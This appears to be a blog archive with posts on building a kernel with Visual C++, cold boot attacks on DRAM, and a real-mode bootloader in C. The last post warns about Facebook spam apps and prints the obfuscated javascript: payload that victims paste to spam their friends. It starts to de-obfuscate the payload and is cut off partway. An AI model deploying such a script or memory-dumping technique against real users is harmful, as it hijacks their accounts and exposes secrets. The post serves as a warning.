Saturday, February 18, 2012

Writing kernel in Windows with Visual Studio C/C++

Most hobby osdev projects prefer the *nix + gcc combination these days, primarily because there are plenty of good tutorials and examples available for it. Considering the flexibility, I personally think it is a good choice too. But if you are a heretic by nature and are curious about how you can do osdev with just the Express edition of Visual C++ and some other free software, without leaving Windows (by choice or because you are forced to stay), this post is for you.

In this post I will simply demonstrate the toolchain setup. The complete package can be downloaded from the 'Download' section further down. The 'kernel' written in this tutorial is the lame hello-world kind. We will get it working with PXE boot in VirtualBox (substitute any emulator of your choice). It also works with the default Windows Boot Manager (WBM, the GRUB equivalent, just lamer) without modifications, and can easily be adapted to boot from an mbr/vbr in stages. Let's face it - even osdev noobs these days are so over floppies.

Kernel loader (stub)
For a kernel loader stage, there are many ways of entering protected mode, loading the actual kernel image, relocating and passing control to the kernel. Here is one that I think is simple enough to fit in a blogspot post.

The image loaded by PXE/WBM consists of two parts: the stub and the kernel executable image. Both PXE and WBM (are supposed to) load our image at physical address 0x7c00, or 7c0h:0h in real mode. This means that the stub must be 16-bit real mode code that is statically linked to run at 7c00h. The kernel executable produced by the Visual C++ toolchain (cl.exe and link.exe), on the other hand, is 32-bit protected mode code in PE format. Its sections also have to be copied to the addresses they were linked for before it can run. Thus, the stub must set up pmode, relocate the kernel to the address it is supposed to run at and then pass control to it.

The stub in this tutorial is written in assembler for simplicity. I have used yasm, primarily because it supports both AT&T and Intel syntax and it can output a flat binary.

stub.asm

; toyos boot stub

; irrespective of whether we are (chain)loaded from Windows bootloader or through PXE, we are loaded at 7c0:0
[org 7c00h]
; because i386 is old :P
[CPU P4]


NULL_SEG equ 00h    ; unused
CODE_SEG equ 08h    ; cs
DATA_SEG equ 10h    ; all other segments

section .text
[bits 16]
_entry:
 cli ; no interrupts
 xor ax, ax
 mov ds, ax
 
 lgdt [gdt_desc] ; load GDTR
 mov eax, cr0
 or al, 1
 mov cr0, eax    ; set pmode bit
 jmp CODE_SEG:clear_pipeline ; far jump flushes the prefetch queue so that we truly enter pmode

[bits 32]
clear_pipeline:
 mov ax, DATA_SEG
 mov ds, ax
 mov es, ax
 mov ss, ax
 lea esp, [initial_stack_top]
 jmp chain

chain:
 mov byte [0b8000h], '1'     ; just some on-screen debugging
 mov byte [0b8001h], 01bh

 EXELOADADDR    equ PAYLOAD_ADDRESS  ; the load address of payload (kernel) exe
    ; PE header offsets
 sigMZ         equ esi
 PEheaderOffset   equ esi+60
 sigPE         equ esi
 NumSections      equ esi+6
 BaseOfCode      equ esi+52  ; note: offset 52 from the PE signature is the ImageBase field of a PE32 optional header
 EntryAddressOffset   equ esi+40
 SizeOfNT_HEADERS   equ 248

 SectionSize      equ esi+8
 SectionBase      equ esi+12
 SectionFileOffset   equ esi+20
 SizeOfSECTION_HEADER   equ 40

 mov esi, EXELOADADDR
 mov eax, [sigMZ]
 cmp ax, 0x5A4D  ; signature check
 jnz badPE
 mov eax, [PEheaderOffset]
   
 add esi, eax
 mov eax, [sigPE]
 cmp eax, 0x00004550
 jnz badPE
   
 xor edx, edx
 mov dx, [NumSections]
 mov eax, [BaseOfCode]
 mov ebx, [EntryAddressOffset]
   
 add ebx, eax
 push ebx
   
 add esi, SizeOfNT_HEADERS

    ; load each section
 .loadloop:
  mov ecx, [SectionSize]
  mov edi, [SectionBase]
  add edi, eax
  mov ebx, [SectionFileOffset]
  add ebx, EXELOADADDR
   
  push esi
   
  mov esi, ebx
  rep movsb       ; copy each section to its respective load/run address
   
  pop esi
  add esi, SizeOfSECTION_HEADER
   
  dec edx
  or edx, edx
  jnz .loadloop

  pop ebx ; restore entry
  jmp ebx ; jump to entry

; PE image invalid
badPE:
 mov eax, 0b8000h
 mov byte [eax], '!'
 mov byte [eax + 1], 01bh

; spin away!    
infloop:
 hlt
 jmp infloop

; data section
section .data
initial_stack:
 times 128 dw 0  ; oughtta be enough
initial_stack_top:

; global descriptor table
gdt:
gdt_null:
    dd 0
    dd 0

gdt_code:
    dw 0FFFFh   ; RTFM
    dw 0
    db 0
    db 10011010b
    db 11001111b
    db 0

gdt_data:
    dw 0FFFFh
    dw 0
    db 0
    db 10010010b
    db 11001111b
    db 0
gdt_end:


gdt_desc:                       ; The GDT descriptor
    dw gdt_end - gdt - 1    ; Limit (size)
    dd gdt                  ; Address of the GDT

align 4
PAYLOAD_ADDRESS:    ; this is where the exe is loaded
stub.asm can be assembled as

yasm -Xvc -f bin --force-strict -o stub.o stub.asm
This should create a flat binary for stub.
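The header walk that the stub performs can be mirrored in C on the host, which is handy for checking a kernel image before booting it. The following is only a sketch under the same assumptions the stub makes (a PE32 image with a 248-byte NT header block); `pe_info_t` and `pe_parse` are names invented for this example.

```c
#include <stddef.h>
#include <stdint.h>

/* Little-endian reads that make no alignment assumptions. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Hypothetical result type: the fields the stub cares about. */
typedef struct {
    uint32_t image_base;     /* preferred load address (link /BASE)  */
    uint32_t entry;          /* image_base + AddressOfEntryPoint     */
    uint16_t num_sections;   /* NumberOfSections                     */
    uint32_t first_section;  /* file offset of first section header  */
} pe_info_t;

/* Returns 0 on success, -1 if the buffer does not look like a PE32 image. */
int pe_parse(const uint8_t *img, size_t len, pe_info_t *out)
{
    if (len < 64 || rd16(img) != 0x5A4D)        /* "MZ" */
        return -1;
    uint32_t nt = rd32(img + 60);               /* e_lfanew */
    if (nt > len || len - nt < 248)
        return -1;
    if (rd32(img + nt) != 0x00004550)           /* "PE\0\0" */
        return -1;
    out->num_sections  = rd16(img + nt + 6);
    out->image_base    = rd32(img + nt + 52);
    out->entry         = out->image_base + rd32(img + nt + 40);
    out->first_section = nt + 248;              /* section table follows */
    return 0;
}
```

For a kernel linked with /BASE:0x00100000, `image_base` should come back as 0x00100000 and `entry` should land inside the code section.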

Kernel
If you reached here, you probably know what you can/should and can/should not use in a kernel. I am assuming that you have some experience with writing such code in other toolchains.

The kernel for this tutorial is hilariously simple. It can be C or C++.

kernel.cc

// declare strlen ourselves so that cl can use its intrinsic version (/Oi); no CRT is linked
extern "C" size_t strlen(const char*);

int main()
{
 char* msg = "yuffie> SO U HACKING ME THEN HUH\n"
                "yuffie> WElL I GOT NEWS FOR U MISTER I GOT MORE FIREWALL POWERS NOW SO IM SECURE AND IM USING WINDOWS 98 SO IM REALLY SECURE FROM HACKERS LIKE YOU SO YOU BETTA JUST GIVE UP CUZ U GOT NO HOPE MISTER.\n"
                "* YuFFie (~mirc@3B942731.dsl.stlsmo.swbell.net) Quit (Quit: Owned.)\n"
                "* YuFFie (~mirc@3B942731.dsl.stlsmo.swbell.net) has joined #\n"
                "yuffie> HELP MY MOUSE IS MOVING BY IT SELF";
 int msgLen = strlen(msg);
 char* vidmem = (char*)0xB8000;
 int vidIdx = 0;
 for(int i = 0; i < msgLen; ++i)
 {
        if(msg[i] == '\n')
        {
            vidIdx = (((vidIdx / 80) + 1) * 80) % (80 * 25);
        }
        else
        {
            vidmem[2 * vidIdx] = msg[i];
            vidmem[(2 * vidIdx) + 1] = 0x1b;
            ++vidIdx;
        }
 }

 while(true);

 return 0;
}
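The newline arithmetic in the loop above is easy to get wrong, so here is a small host-side sketch of it, assuming the usual 80x25 colour text mode. The helper names are made up for this example.

```c
/* Assumed text mode geometry: 80 columns by 25 rows, 2 bytes per cell. */
enum { VGA_COLS = 80, VGA_ROWS = 25 };

/* Move a linear cell index to the start of the next row,
 * wrapping back to the top-left cell after the last row. */
int vga_next_line(int idx)
{
    return (((idx / VGA_COLS) + 1) * VGA_COLS) % (VGA_COLS * VGA_ROWS);
}

/* Byte offset of a cell's character byte from 0xB8000;
 * the attribute byte sits at the following offset. */
int vga_cell_offset(int idx)
{
    return 2 * idx;
}
```

Note that only the newline path wraps around; a message longer than one screen would still need a bounds check on the ordinary character path.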

Here is the tricky part. We must compile kernel.cc so that it can run standalone, without any ties to the hosted Windows environment. With Visual C++ 2010, I have seen the following switches work. I am going to save on typing, as MSDN explains each of these switches in detail.

cl /Zi /nologo /W4 /WX- /O2 /Oi /Oy- /GL /X /c /GF /Gm- /Zp4 /GS- /Gy- /fp:precise /fp:except- /Zc:wchar_t /Zc:forScope /GR- /openmp- /Gd /analyze- /Fd"kernel.pdb" /Fo"kernel.obj" kernel.cc
link /VERBOSE /VERSION:"0.0.0.1" /NOLOGO /NODEFAULTLIB /MANIFEST:NO /ALLOWISOLATION:NO /DEBUG /SUBSYSTEM:NATIVE /LARGEADDRESSAWARE /DRIVER /ENTRY:"main" /BASE:"0x00100000" /FIXED /MACHINE:X86 /ALIGN:4096 /SAFESEH:NO /OPT:REF /OPT:ICF /OUT:kernel.o kernel.obj

Creating the boot image
This is the simplest part.

copy /B /Y stub.o+kernel.o kernel

Yay! Now you have a PXE/WBM bootable image!

PXE boot setup instructions (or lack thereof)
Unless you are using Windows Server as the host OS, chances are that you will have to work with a non-Microsoft solution for DHCP and TFTP servers with PXE boot support. I have used tftpd32 in the past as well as in this tutorial, and have had no complaints thus far. Setting up DHCP and TFTP servers in general is out of the scope of this tutorial, but tftpd32 configuration is a walk in the park: bind the DHCP and TFTP servers to the local interface, set the TFTP root directory, and set the boot file name to the boot image. Fire up any virtual machine of your choice whose NIC has a PXE boot ROM. I have used VirtualBox. Start the VM and boot from LAN. You should see some activity in tftpd32, and moments later you should see the message.

WBM
It is fairly easy to add your kernel alongside the Windows entry in the Windows bootloader. There are tutorials [1, 2] on creating new BCD entries. Just add your kernel as a BOOTSECTOR application. EasyBCD is an option in case you are not comfortable with bcdedit.

Download
Using Visual C++ IDE
Download
Sure, these build rules can be set in VC++ projects. Enjoy one-button-hit builds with VC++'s Intellisense. Eventually when you get a debugger stub in your kernel, you could also get source level debugging working within WinDbg.
32bit versions of yasm and tftpd32 are included.

Using Makefiles
Download
I never felt comfortable when an IDE came between me and my source code custom build rules. If you too think that makefiles are the way to go, nmake works out of the box. I personally think CMake is a better choice if your project gets serious.
32bit versions of yasm and tftpd32 are included.

Please let me know if you decide to use Microsoft compilers for osdev.

Good luck!

Wednesday, June 16, 2010

Cold boot attack

How safe and secure is your data when stored on a PC/workstation or a laptop? Say you also have whole disc/volume encryption, maybe activated by a USB key. Even then, how secure is your data?

If the computer is turned on when it physically falls into the hands of an attacker, you might be at risk even with whole disc encryption enabled and the screen locked behind your (uncompromised) password. This is especially true for portable machines like laptops and netbooks. There are many possible attacks; in this post we will look into a specific one called the cold boot attack.

Something about memory

Chances are that your main memory is based on DRAM technology, which includes popular variants such as SDRAM, DDRx and, in most cases, even VRAM. As it is widely considered to be a volatile type of memory, we are under the impression that it loses its contents as soon as power is cut off. Sadly, the contents are not lost instantaneously; they decay gradually because of the way DRAM stores data.

Figure 0 : A DRAM Cell
Without going into the details of the dynamic logic, it suffices to say that the bit is stored as charge on a capacitor, which is connected to the rest of the circuit through a transistor that acts like a switch. Simply put, if the capacitor holds charge above a certain level, we interpret the bit value as 1, and as 0 otherwise. (Each column (bit) line like the one shown in Figure 0 is actually a pair of bit lines, +ve and -ve, which are connected to alternate cells/FETs in the row. When reading, after both bit lines have been precharged, RAS is activated and the sense amplifier kicks in. Thanks to positive feedback, it can detect the slight charge difference between the +ve and -ve bit lines.)

Capacitors are not perfect. They lose charge over time as leakage current. Thus, each DRAM cell has to be `refreshed' frequently enough to retain content. Even though manufacturers usually recommend the DRAM be refreshed at least every 64ms (to ensure that there is no data corruption), well built DRAMs have a retention period that is significantly greater than the suggested refresh period. It goes without saying that some bits do corrupt, but the rate at which they do is pretty low when you put 64ms in perspective. This is true even after turning the power off entirely.

How does this concern me?

Well, the significantly long retention period of main memory is a security hole. If a computer is physically compromised while it is powered on, the attacker can read most of the contents of your main memory. Main memory holds a wealth of information: any user names and passwords that are `cached' by applications, encryption keys for hard drive/volume encryption, SSL private keys for active connections, and (maybe partial) contents of any file that is or was recently open, at times including portions of deleted files. (After a file is closed, most operating systems do not clear the memory pages used as block cache, for obvious performance reasons.) This assumes that the machine is locked in some sense and that the attacker does not know the unlocking password.

At room temperature, the DRAM holds on to the stored bits if the power down/up cycle completes within 64ms. Errors are introduced as the powered-off period increases. The period during which no or very few bits are corrupted can be significantly increased if the DRAM modules are cooled to around or below 0 degrees C. Such `cold' modules can then be inserted into another compatible machine and their contents dumped for detailed analysis. I believe the retention is extended because the capacitors usually have aluminum oxide as the dielectric, whose leakage current drops as the temperature drops.
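To put a number on how much a dump has decayed, one can write a known pattern to memory before the power cycle and compare it with what is read back afterwards. The sketch below shows only the comparison step; the function names are illustrative and how the two buffers are obtained is left open.

```c
#include <stddef.h>
#include <stdint.h>

/* Count the bits that differ between the reference pattern and the dump. */
size_t count_flipped_bits(const uint8_t *ref, const uint8_t *dump, size_t len)
{
    size_t flipped = 0;
    for (size_t i = 0; i < len; ++i) {
        uint8_t diff = (uint8_t)(ref[i] ^ dump[i]);
        while (diff) {
            diff &= (uint8_t)(diff - 1);   /* clear the lowest set bit */
            ++flipped;
        }
    }
    return flipped;
}

/* Fraction of bits in error; defined as 0.0 for an empty buffer. */
double bit_error_rate(const uint8_t *ref, const uint8_t *dump, size_t len)
{
    if (len == 0)
        return 0.0;
    return (double)count_flipped_bits(ref, dump, len) / (8.0 * (double)len);
}
```

Running this over dumps taken after increasingly long power-off periods, at different temperatures, would give a rough decay curve for a particular module.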

A very good paper from Princeton University discussing how to detect keys in the dumps is here. They claim to have broken almost every hard drive encryption solution there is :(. They also provide software to dump memory contents on a portable drive.

This technique is important for forensics/law enforcement as well. During a bust of a computer crime suspect, memory dumps of the machines are extremely important to support the case. This technique allows the law enforcers to get the system state or a snapshot as it was at the time of the bust even without the suspects' co-operation.

Note that the technique is ineffective against other types of memory, for example bistable latched SRAM. So in case you are wondering if you could get something out of the hard drive caches or something from the buffers of a compromised router, you are out of luck!

Does it really work? Can I see it working on my machine?

Sure!

I've created a simple RAM browser (kernel) named `RAMBO' (download source) which, as the name says, can be used to browse the RAM contents after a simulated theft and cold reboot. You can choose to be super-realistic, pulling the cord of your desktop or pulling the battery out of your laptop and putting it back in a jiffy. If you are worried about pulling the cord while Windows/*NIX is running, you can instead load a file to a certain RAM location, reboot, and check whether the contents are still readable after the reboot. The program has to be loaded by a multiboot compliant bootloader such as GRUB. It does not touch any hardware other than the processor, memory and keyboard, so rest assured that you will not end up with a corrupt disc or fried electronics. In case you do not have such a loader installed already, you can install one on a floppy or a USB stick and copy the program to it, so that you can load it when you boot from the USB stick/floppy. The README provides more info on how to use it.

Tuesday, June 15, 2010

Real mode in C with gcc : writing a bootloader

Usually the x86 boot loader is written in assembler. We will be exploring the possibility of writing one in C (as much as possible), compiled with gcc and running in real mode. Note that you can also use a 16 bit compiler such as bcc or Turbo C, but we will be focusing on gcc in this post. Most open source kernels are compiled with gcc, so it makes sense to write a C bootloader with gcc instead of bcc, as you get a much cleaner toolchain :)

As of today (20100614), gcc 4.4.4 officially only emits code for protected/long mode and does not support the real mode natively (this may change in future).

Also note that we will not discuss the very fundamentals of booting. This article is fairly advanced and assumes that you know what it takes to write a simple boot-loader in assembler. It is also expected that you know how to write gcc inline assembly. Not everything can be done in C!

getting the tool-chain working


.code16gcc

As we will be running in 16 bit real mode, this directive tells gas that the assembly was generated by gcc and is intended to run in real mode. With this directive, gas automatically adds the addr32 prefix wherever required. For each C file that contains code to be run in real mode, this directive must be present at the top of the effectively generated assembler code. This can be ensured by placing it in a header and including that header before any other.

#ifndef _CODE16GCC_H_
#define _CODE16GCC_H_
__asm__(".code16gcc\n");
#endif

This is great for bootloaders as well as for parts of the kernel that must run in real mode but that you would rather write in C than in asm. In my opinion C code is a lot easier to debug and maintain than asm code, at the expense of code size and performance at times.

Special linking


As the bootloader is supposed to run at physical address 0x7C00, we need to tell the linker about it. The mbr/vbr must also end with the proper boot signature 0xaa55.
All this can be taken care of by a simple linker script.

ENTRY(main);
SECTIONS
{
    . = 0x7C00;
    .text : AT(0x7C00)
    {
        _text = .;
        *(.text);
        _text_end = .;
    }
    .data :
    {
        _data = .;
        *(.bss);
        *(.bss*);
        *(.data);
        *(.rodata*);
        *(COMMON)
        _data_end = .;
    }
    .sig : AT(0x7DFE)
    {
        SHORT(0xaa55);
    }
    /DISCARD/ :
    {
        *(.note*);
        *(.iplt*);
        *(.igot*);
        *(.rel*);
        *(.comment);
/* add any unwanted sections spewed out by your version of gcc and flags here */
    }
}

gcc emits elf binaries with sections, whereas a bootloader is a monolithic plain binary with no sections. Conversion from elf to binary can be done as follows:

$ objcopy -O binary vbr.elf vbr.bin
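Before writing the binary to a disk image, it is worth checking that the output really is one sector with the signature in the right place. Since 0xaa55 is stored little-endian, the last two bytes of the sector must be 0x55 followed by 0xAA. A minimal sketch of such a check (the function name is an assumption of this example) could look like this:

```c
#include <stddef.h>
#include <stdint.h>

/* Returns 1 if buf is exactly one 512-byte sector that ends with the
 * boot signature bytes 0x55 0xAA (the little-endian form of 0xaa55),
 * and 0 otherwise. */
int has_boot_signature(const uint8_t *buf, size_t len)
{
    if (len != 512)
        return 0;
    return buf[510] == 0x55 && buf[511] == 0xAA;
}
```

A failed check usually means that code and data together have grown past offset 510, or that an unwanted section slipped into the output.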

The code

With the toolchain set up, we can start writing our hello world bootloader!
vbr.c (the only source file) looks something like this:

/*
 * A simple bootloader skeleton for x86, using gcc.
 *
 * Prashant Borole (boroleprashant at Google mail)
 * */

/* XXX these must be at top */
#include "code16gcc.h"
__asm__ ("jmpl  $0, $main\n");


#define __NOINLINE  __attribute__((noinline))
#define __REGPARM   __attribute__ ((regparm(3)))
#define __NORETURN  __attribute__((noreturn))

/* BIOS interrupts must be done with inline assembly */
void    __NOINLINE __REGPARM print(const char   *s){
        while(*s){
                __asm__ __volatile__ ("int  $0x10" : : "a"(0x0E00 | *s), "b"(7));
                s++;
        }
}
/* and for everything else you can use C! Be it traversing the filesystem, or verifying the kernel image etc.*/

void __NORETURN main(){
    print("woo hoo!\r\n:)");
    while(1);
}


compile it as

$ gcc -c -g -Os -march=i686 -ffreestanding -Wall -Werror -I. -o vbr.o vbr.c
$ ld -static -Tlinker.ld -nostdlib --nmagic -o vbr.elf vbr.o
$ objcopy -O binary vbr.elf vbr.bin

and that should have created the vbr.elf file (which you can use as a symbol file with gdb for source level debugging of the vbr with gdbstub and qemu/bochs) as well as a 512 byte vbr.bin. To test it, first create a dummy 1.44M floppy image and overwrite its boot sector with vbr.bin using dd.

$ dd if=/dev/zero of=floppy.img bs=1024 count=1440
$ dd if=vbr.bin of=floppy.img bs=1 count=512 conv=notrunc

and now we are ready to test it out :D

$ qemu -fda floppy.img -boot a

and you should see the message!

Once you get to this stage, you are pretty much set with respect to the tooling itself. Now you can go ahead and write code to read the filesystem, search for next stage or kernel and pass control to it.

Here is a simple example of a floppy boot record with no filesystem, and the next stage or kernel written to the floppy immediately after the boot record. The next image LMA and entry are fixed in a bunch of macros. It simply reads the image starting one sector after boot record and passes control to it. There are many obvious holes, which I left open for sake of brevity.

/*
 * A simple bootloader skeleton for x86, using gcc.
 *
 * Prashant Borole (boroleprashant at Google mail)
 * */

/* XXX these must be at top */
#include "code16gcc.h"
__asm__ ("jmpl  $0, $main\n");


#define __NOINLINE  __attribute__((noinline))
#define __REGPARM   __attribute__ ((regparm(3)))
#define __PACKED    __attribute__((packed))
#define __NORETURN  __attribute__((noreturn))

#define IMAGE_SIZE  8192
#define BLOCK_SIZE  512
#define IMAGE_LMA   0x8000
#define IMAGE_ENTRY 0x800c

/* BIOS interrupts must be done with inline assembly */
void    __NOINLINE __REGPARM print(const char   *s){
        while(*s){
                __asm__ __volatile__ ("int  $0x10" : : "a"(0x0E00 | *s), "b"(7));
                s++;
        }
}

#if 0
/* use this for the HD/USB/Optical boot sector */
typedef struct __PACKED TAGaddress_packet_t{
    char                size;
    char                :8;
    unsigned short      blocks;
    unsigned short      buffer_offset;
    unsigned short      buffer_segment;
    unsigned long long  lba;
    unsigned long long  flat_buffer;
}address_packet_t ;

int __REGPARM lba_read(const void   *buffer, unsigned int   lba, unsigned short blocks, unsigned char   bios_drive){
        int i;
        unsigned short  failed = 0;
        address_packet_t    packet = {.size = sizeof(address_packet_t), .blocks = blocks, .buffer_offset = 0xFFFF, .buffer_segment = 0xFFFF, .lba = lba, .flat_buffer = (unsigned long)buffer};
        for(i = 0; i < 3; i++){
                packet.blocks = blocks;
                __asm__ __volatile__ (
                                "movw   $0, %0\n"
                                "int    $0x13\n"
                                "setcb  %0\n"
                                :"=m"(failed) : "a"(0x4200), "d"(bios_drive), "S"(&packet) : "cc" );
                /* do something with the error_code */
                if(!failed)
                        break;
        }
        return failed;
}
#else
/* use for floppy, or as a fallback */
typedef struct {
        unsigned char   spt;
        unsigned char   numh;
}drive_params_t;

int __REGPARM __NOINLINE get_drive_params(drive_params_t    *p, unsigned char   bios_drive){
        unsigned short  failed = 0;
        unsigned short  tmp1, tmp2;
        __asm__ __volatile__
            (
             "movw  $0, %0\n"
             "int   $0x13\n"
             "setcb %0\n"
             : "=m"(failed), "=c"(tmp1), "=d"(tmp2)
             : "a"(0x0800), "d"(bios_drive), "D"(0)
             : "cc", "bx"
            );
        if(failed)
                return failed;
        p->spt = tmp1 & 0x3F;
        p->numh = tmp2 >> 8;
        return failed;
}

int __REGPARM __NOINLINE lba_read(const void    *buffer, unsigned int   lba, unsigned char  blocks, unsigned char   bios_drive, drive_params_t  *p){
        unsigned char   c, h, s;
        c = lba / (p->numh * p->spt);
        unsigned short  t = lba % (p->numh * p->spt);
        h = t / p->spt;
        s = (t % p->spt) + 1;
        unsigned char   failed = 0;
        unsigned char   num_blocks_transferred = 0;
        __asm__ __volatile__
            (
             "movw  $0, %0\n"
             "int   $0x13\n"
             "setcb %0"
             : "=m"(failed), "=a"(num_blocks_transferred)
             : "a"(0x0200 | blocks), "c"((c << 8) | s), "d"((h << 8) | bios_drive), "b"(buffer)
            );
        return failed || (num_blocks_transferred != blocks);
}
#endif

/* and for everything else you can use C! Be it traversing the filesystem, or verifying the kernel image etc.*/

void __NORETURN main(){
        unsigned char   bios_drive = 0;
        __asm__ __volatile__("movb  %%dl, %0" : "=r"(bios_drive));      /* the BIOS drive number of the device we booted from is passed in dl register */

        drive_params_t  p = {};
        get_drive_params(&p, bios_drive);

        void    *buff = (void*)IMAGE_LMA;
        unsigned short  num_blocks = ((IMAGE_SIZE / BLOCK_SIZE) + (IMAGE_SIZE % BLOCK_SIZE == 0 ? 0 : 1));
        if(lba_read(buff, 1, num_blocks, bios_drive, &p) != 0){
            print("read error :(\r\n");
            while(1);
        }
        print("Running next image...\r\n");
        void*   e = (void*)IMAGE_ENTRY;
        __asm__ __volatile__("" : : "d"(bios_drive));
        goto    *e;
}


Removing __NOINLINE may result in even smaller code in this case. I had it in place so that I could figure out what was happening.
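The LBA to cylinder/head/sector conversion used for the floppy read is worth testing on the host, because a mistake there silently reads the wrong sector. The sketch below repeats the arithmetic and also packs the CX register the way INT 13h, AH=02h expects it: CH holds the low 8 bits of the cylinder, CL holds the sector in bits 0-5 and cylinder bits 8-9 in bits 6-7. The names `chs_t`, `lba_to_chs` and `chs_to_cx` are made up for this example.

```c
/* Cylinder/head/sector triple; sectors are 1-based, the rest 0-based. */
typedef struct {
    unsigned cylinder;
    unsigned head;
    unsigned sector;
} chs_t;

/* Convert a linear block address using the drive geometry
 * (heads per cylinder, sectors per track). */
chs_t lba_to_chs(unsigned lba, unsigned heads, unsigned spt)
{
    chs_t r;
    unsigned per_cylinder = heads * spt;
    unsigned rem = lba % per_cylinder;
    r.cylinder = lba / per_cylinder;
    r.head     = rem / spt;
    r.sector   = (rem % spt) + 1;
    return r;
}

/* Pack CX for INT 13h AH=02h: CH = cylinder bits 0-7,
 * CL = sector (bits 0-5) plus cylinder bits 8-9 (bits 6-7). */
unsigned chs_to_cx(chs_t a)
{
    return ((a.cylinder & 0xFFu) << 8) |
           ((a.cylinder >> 2) & 0xC0u) |
           (a.sector & 0x3Fu);
}
```

On a 1.44M floppy (2 heads, 18 sectors per track), LBA 1 maps to cylinder 0, head 0, sector 2, which is the sector right after the boot record.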

Concluding remarks

C in no way matches the code size and performance of hand-tuned, size/speed optimized assembler. Also, because an extra prefix byte (0x66 for operand size, 0x67 for address size) is spent on almost every instruction, it is highly unlikely that you can cram in the same amount of functionality as with assembler.

Global and static variables, initialized as well as uninitialized, can quickly fill those precious 446 bytes. Changing them to locals and passing them around instead may increase or decrease the size; there is no rule of thumb, and it has to be worked out on a case by case basis. The same goes for function inlining.

You also need to be extremely careful with various gcc optimization flags. For example, if your code has a loop whose iteration count is small and deducible at compile time, and the loop body is relatively small (even 20 bytes), gcc will unroll that loop with the default -Os. If the loop is not unrolled (-fno-tree-loop-optimize), you might be able to shave off a big chunk of bytes. The same holds true for frame setups on i386 - you may want to get rid of them whenever they are not required, using -fomit-frame-pointer. Moral of the story: you need to be extra careful with gcc flags as well as with compiler version updates. This is not much of an issue for other real mode modules of the kernel, where size is not of such prime importance.

Also, you must be very cautious with assembler warnings when compiling with .code16gcc. Truncation is common. It is a very good idea to use -save-temps and analyze the assembler code generated from your C and inline assembly. Always take care not to mess with the C calling convention in inline assembly, and meticulously check and update the clobber list for inline assembly doing BIOS or APM calls (but you already knew it, right?).

It is likely that you want to switch to protected/long mode as early as possible, though. Even then, I still think that maintainability wins over asm's size/speed in case of a bootloader as well as the real mode portions of the kernel.

It would be interesting if someone could try this with c++/java/fortran. Please let me know if you do!

Saturday, May 08, 2010

How not to look like a fool on facebook

I did it already. Warning you so that you don't.

There is a full blown army of apps on Facebook which spam your friends with recommendations without your consent. Going by Facebook's policies, these apps are spam, and you should report them as soon as possible.

They are named in interesting ways. When you click the link, it first shows a button.
Let us take an example of 'Is this dog ugly?'.



As it came from a credible friend, you go ahead and click the button,


and do as you are told, expecting some image with a fancy JavaScript animation.


You paste the code, hit enter, and wait for it.
Before you know it, it has sent invitations to your friends, and you end up looking like a fool!

This is how it works :

the script you copy looks something like this:

javascript:(function(){a = "app120196878004524_jop"; b = "app120196878004524_jode"; ifc = "app120196878004524_ifc"; ifo = "app120196878004524_ifo"; mw = "app120196878004524_mwrapper"; function ff(p, a, c, k, e, r) { e = function (c) { return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)); }; if (!"".replace(/^/, String)) { while (c--) {r[e(c)] = k[c] || e(c);}k = [function (e) {return r[e];}];e = function () {return "\\w+";};c = 1; } while (c--) { if (k[c]) {p = p.replace(new RegExp("\\b" + e(c) + "\\b", "g"), k[c]);} } return p; } str = ff("J e=[\"\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A\",\"\\j\\h\\A\\i\\f\",\"\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t\",\"\\w\\g\\t\\t\\f\\k\",\"\\g\\k\\k\\f\\x\\M\\N\\G\\O\",\"\\n\\l\\i\\y\\f\",\"\\j\\y\\o\\o\\f\\j\\h\",\"\\i\\g\\H\\f\\r\\f\",\"\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j\",\"\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h\",\"\\p\\i\\g\\p\\H\",\"\\g\\k\\g\\h\\q\\n\\f\\k\\h\",\"\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h\",\"\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i\",\"\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r\",\"\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z\",\"\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o\"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);", 62, 69, "||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||".split("|"), 0, {})})();

With slightly better formatting, it looks like

a='app120196878004524_jop';
b='app120196878004524_jode';
ifc='app120196878004524_ifc';
ifo='app120196878004524_ifo';
mw='app120196878004524_mwrapper';
eval(
 function(p,a,c,k,e,r){
  e=function(c){
   return (c<a?'':e(parseInt(c/a)))+
      ((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))
  };
  if(!''.replace(/^/,String)){
   while(c--)
    r[e(c)]=k[c]||e(c);
   k=[function(e){return r[e]}];
   e=function(){
    return'\\w+'
   };
   c=1
  };
  while(c--)
   if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
  return p
 }
